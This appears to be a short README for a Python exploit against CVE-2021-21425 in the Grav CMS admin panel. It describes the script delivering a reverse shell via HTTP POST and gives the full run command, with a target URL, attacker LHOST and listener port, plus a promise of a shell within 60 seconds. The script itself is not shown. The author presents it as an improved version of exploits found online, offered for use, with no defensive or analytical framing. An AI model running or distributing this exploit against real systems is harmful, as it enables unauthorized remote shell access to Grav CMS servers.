
Python exploit script for CVE-2021-21425 targeting Grav CMS admin panel, delivering a reverse shell via HTTP POST request with configurable LHOST and LPORT.
this is my version i found a lot in internet but those are too bad
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
wait.. for 60sec you will get shell at your listener